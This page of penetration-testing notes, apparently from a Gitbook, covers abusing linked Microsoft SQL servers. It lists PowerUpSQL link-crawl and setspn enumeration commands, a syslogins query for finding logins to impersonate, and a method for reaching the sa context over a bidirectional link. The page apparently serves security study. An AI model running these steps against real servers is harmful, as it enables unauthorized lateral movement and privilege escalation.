All Gitbook

Linked SQL Servers

If linked SQL servers exist, it may be possible to exploit them depending on the security context of the link. *not bidirectional by default*

LogoQuery remote servers (Database Engine) - SQL ServerMicrosoftLearn
While Microsoft documentation specifies that execution of stored procedures is not supported on linked SQL servers with the OPENQUERY keyword, it is actually possible.

Enumerate for linked servers

with PowerUpSQL
Get-SqlServerLinkCrawl -Verbose -Instance SQLSERVER1\Instance1

#to find login account for EXEC AS LOGIN
Get-SqlServerLinkCrawl -Verbose -Instance SQLSERVER1\Instance1 -Query "select * from master..syslogins" | ft

May also found links in other forest, then compromise with the same way.

enum across trusted domain: setspn -T corp1 -Q MSSQLSvc/*

enum across trusted forest: setspn -T corp2.com -Q MSSQLSvc/*

It is possible that we can logon as privileged user on another server even we are having low privilege on the original server. Try Impersonating using the info from the output in the beginning if not.

Command Execution

Privilege Escalation on the local server via bidirectional link

When the link from instance 1 to instance 2 has sa security context, and instance 2 has a link to instance 1, we could follow the link to instance 2 to obtain the sa login context and return back over the link to instance 1. Use when no other privilege escalation paths on the local server.

PreviousSQLNextKiosk Breakout

Last updated